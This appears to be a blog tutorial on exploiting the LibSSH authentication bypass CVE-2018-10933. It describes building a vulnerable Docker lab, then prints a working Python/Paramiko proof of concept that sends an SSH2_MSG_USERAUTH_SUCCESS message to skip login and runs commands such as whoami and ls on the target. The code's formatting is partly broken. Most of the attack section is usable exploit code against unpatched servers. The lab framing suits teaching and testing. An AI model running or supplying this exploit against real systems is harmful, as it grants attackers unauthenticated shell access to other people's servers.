Exploiting LibSSH – Authentication Bypass Vulnerability (CVE-2018–10933)

All right lads,

Recently a security researcher Peter Winter found a critical vulnerability in LibSSH library. Which allows an attacker to gain root access to server without username and password. The vulnerability resides in authentication mechanism of LibSSH library.

The vulnerability is very easy to exploit and requires an attacker sending an affected server an “SSH2_MSG_USERAUTH_SUCCESS” request to trick the server into thinking the user has already authenticated. for more information refer links at end of the article.

Let’s setup our test environment 🙂

Requirements : –

  1. Docker (Windows/Linux)
  2. Python 2.7 with Paramiko module.
  3. cygwin64
  4. Download vulnerable LibSSH Docker zip from here.

Now extract the downloaded cve201810933.zip file into Docker installation directory.

Open start.sh

Docker Installation Directory

Install docker container using below command. It will take some time to download the required packages.

docker build -t fluidattackscve201810933 .

LIbSSH vulnerable Docker Installation

Now open container by running below command.

docker run -it -p 2222:2222 fluidattackscve201810933:latest

Starting our vulnerable server

You will get the root shell and now start LibSSH server run below command.

./tmp/libssh-0.7.4/build/examples/samplesshd-cb -k ~/.ssh/id_dsa 0.0.0.0 -k ~/.ssh/id_rsa -p 2222 — verbose

then in your machine run below exploit. (Make sure you have install Paramiko module).

/usr/bin/python

# PoC obtained from https://www.openwall.com/lists/oss-security/2018/10/17/5

import paramiko
import socket
import sys

import time

nbytes = 4096
hostname = “192.168.99.100” //target docker IP
port = 2222 /// LibSSH port

sock = socket.socket()
try:
sock.connect((hostname, port))
# instantiate transport
m = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()

m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(m)

cmd_channel = transport.open_session()
cmd_channel.set_combine_stderr(True)
cmd_channel.exec_command(“whoami; id; ls -la /; ip addr”)

except socket.error:
print ‘[-] Connecting to host failed. Please check the specified host and port.’
sys.exit(1)

LibSSH Authentication Bypass Vulnerabilit

Below screenshot shows successful authentication to server and output of executed commands.